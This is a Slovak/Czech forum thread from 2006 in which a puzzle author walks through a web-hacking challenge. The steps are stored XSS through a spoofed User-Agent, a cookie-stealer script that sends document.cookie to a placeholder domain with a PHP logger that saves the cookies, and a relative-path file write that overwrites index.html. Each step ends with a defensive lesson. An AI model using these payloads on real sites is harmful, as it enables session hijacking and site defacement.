Přidat otázku mezi oblíbenéZasílat nové odpovědi e-mailem hadanka c.5 - vysvetlenie

******* http://pc.poradna.net/question/view/66560-hadanka-c -5-obnov-stranku *******
ok, vidim ze este nie ste pripraveni na real web hacking a preto dalsia hadanka bude lahsia a bude z kategorie basic web hacking. budem sa tu snazit vysvetlit jednotlive kroky a ich dosah, ale rozhodol som sa, ze vam to nepoviem naraz(mam rad napatie). budem to vysvetlovat po jednotlivych krokoch(celkovo su 3) a s tyzdnovym odstupom, aby ste sa este samostatne mohli(aj ked neskoro) dostat do hall of fame.
1., najprv bolo treba najst dolezitu informaciu, kde je vlastne zaloha povodnych stranok. ta sa nachadzala v subore help.html(bolo treba pozriet do zdrojakov a odscrollovat :-p), na hlavnej stranke link - help.
- ponaucenie: aj ked nasi hackeri boli ocividne spicky, urobili jednu podstatnu chybu a to ze dolezite informacie ulozili do html zdrojakov, aj ked si mysleli ze ich nikto nenajde.

2., tu som chybu urobil ja. urobil som sice monitoring navstevnosti, ktory zabezpecoval script monitoring.php ale neuvedomil som si, ze aj informacie typu user_agent mozu byt zneuzite(user agent switcher(ff), proxomitron(proxy server)). tu mi utocnik vlozil cookie stealer a pri prihlaseni sa pod adminom a prezreti si monitoringu som o svoje cookie prisiel. :-p mozny cookie stealer bol:

<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>

nejaky_cookie_citac.php mohol vyzerat takto:

<?php
 $cookie = $_GET['c'];
 $fp = fopen('mycookies.html', 'a');
 fwrite($fp, "$cookie\n<br>");
 fclose($fp);
?>

-ponaucenie: pokial si na svojej stranke zaznamenavate aj informacie typu napr. user_agent, referrer, tak treba mysliet nato, ze aj toto je mozne zneuzit(nie len input z formulara alebo z url) a najlepsie je podla mna zmenit

< a >

na znakove entity:

&#60; a &#62;

, je s tym najmenej roboty. :-p

3., a mame tu posledny bod. stacilo vojst do admin toolu, zadat meno a heslo, ktore sme adminovi ukradli a ako meno suboru uviest index.html a obsah spravy bol prave povodny html kod index.html v adresari _tmp_. bolo si vsak treba uvedomit ze sme v adresari _tmp_, preto ako meno sme pouzili: ../index.html(relativna cesta o uroven vyssie) alebo sme mohli pouzit absolutnu cestu: index.html. akceptovana bola aj index.html. tymto sme prepisali povodny index.html.
-ponaucenie: davajte si velkeho bacha, ak dovolite zapisovat sobory na vas web, aby tam nahodou niekto nezapisal vlastny php shell. :D

Jsou zobrazeny jen nové odpovědi. Zobrazit všechny
Předmět Autor Datum
kedy bude dalsie pokracovanie? :)) to se pozna, ze mam slovenske predky :-) nový
angel333 05.12.2006 19:05
angel333
som myslel ze az zajtra, ale mozem to v podstate napisat aj dnes. //edit: slovencina ti fakt ide dob… nový
IgorK 05.12.2006 19:32
IgorK
ne ne, v pohode, ja nespecham, ja len, jestli si na to nezabudol :-) ps: jsem jenom z 1/4 slovak nový
angel333 05.12.2006 20:14
angel333
ps: jsem jenom z 1/4 slovak - po starej mame alebo starom otcovi? :-) nový
IgorK 05.12.2006 20:19
IgorK
po brachovi ]:) nový
Jan Fiala 05.12.2006 20:21
Jan Fiala
no napadli ma rozne kombinacie. radsej budem ticho. :-D nový
IgorK 05.12.2006 20:32
IgorK
:-D stara mama normalni mamy :-D nový
angel333 05.12.2006 20:38
angel333
slovenskych predkov Mezi smajlíky už podle mě píše česky. Slovensky by bylo: "to sa pozna, ze mam s… nový
Kráťa 06.12.2006 00:50
Kráťa
Abych rekl popravde ma narodnost je taky slovenska ale slovensky neumim ani prd takze radeji budu ml… nový
virus 06.12.2006 06:35
virus
vsak ja taky ne :-) jen sem si to chtel zkusit, ale je to tezsi, nez sem si myslel :)) nový
angel333 06.12.2006 10:58
angel333
updated, pozri hore. p.s.: ok, tato hadanka bola dost tazka a chcel som mat od vas na 1/2 roka pokoj… nový
IgorK 11.12.2006 23:11
IgorK
Kdybych na to měl čas...:-( Zatím jsem totéž též vypátral. Napnutý jako xˇanda (šle), očekávám happy… nový
Rce 11.12.2006 23:32
Rce
happy end bude. nakoniec zachranime moju deravu stranku. ;-) nový
IgorK 12.12.2006 00:12
IgorK
to tam opravdu stacilo zadat pouhy script? ja sem se tam matlal s onload a ruznyma typama uvozovek,… nový
angel333-skola 12.12.2006 09:10
angel333-skola
Kazdy cookie stealer je len script (ak chces aby pracoval automaticky pri zobrazeni stranky), dokonc… nový
MM.. 12.12.2006 10:50
MM..
cookie stealer jsem mel u sebe na hostingu, to jo. zkousel jsem ho a fungoval. ale ten javascript...… nový
angel333 12.12.2006 19:44
angel333
proxomitron je uplne easy. ako dobre vies, user agent sa posiela v hlavicke http packetu, takze si t… nový
IgorK 12.12.2006 20:11
IgorK
Do FF nepotrebujes ziadne rozsirenie, staci ak si useragenta prepises v about:config (vytvoris poloz… poslední
MM.. 30.12.2006 00:45
MM..
updated. btw., pripravil som pre vas dalsie 2 hadanky, ale zacneme od zakladov. nebudu teda take taz… nový
IgorK 25.12.2006 14:43
IgorK

Abych rekl popravde ma narodnost je taky slovenska ale slovensky neumim ani prd takze radeji budu mluvit jak mluvim, jakykoliv pokus odemne napsat slovensky cokoliv by vypukl paskvilem. :-D
Pamatuji pratetku ve stavniku kdyz neco chtela a ja nevedel co to je, odpoved vzdy vypadala stylem pokus omyl. :-D:-D
Narodil jsem se v cechach.

updated, pozri hore.
p.s.: ok, tato hadanka bola dost tazka a chcel som mat od vas na 1/2 roka pokoj. ]:) nabuduce uz bude lahsia a zacneme od zakladov. potom ked budete ready, prejdeme znova na takyto druh hadaniek. ;-)

Kazdy cookie stealer je len script (ak chces aby pracoval automaticky pri zobrazeni stranky), dokonca staci ak by to bola linka ale na nu by musel admin kliknut. Dolezite je len ze si odosles cookie na svoj server (kam vedie ta linka). Samozrejme musis mat niekde hosting a tvoj php script ktory ti ten cookie niekde ulozi (to je ten druhy 5riadkovy php script).

cookie stealer jsem mel u sebe na hostingu, to jo. zkousel jsem ho a fungoval. ale ten javascript... melo se to zadat do user-agenta, takze jsem si udelal cmd soubor, do nej jsem dal

wget --user-agent <script>blablalba....

ale von me wget jedny uvozovky nak nebral, druhy bral ale nak jinak to neslo, no proste sem neprosel pres svyho wgeta :-D

zkousel jsem i proxytron (nebo jak se to jmenuje), ale ten se mi nepovedlo rozchodit, nak sem vubec nepochopil system tech filtru, tak sem to hned vzdal.

dalsi moznost je samozrejme naky rozsireni do firefoxu, ale ff nepouzivam a instalovat ho.. nechci ;-)

Zpět do poradny Odpovědět na původní otázku Nahoru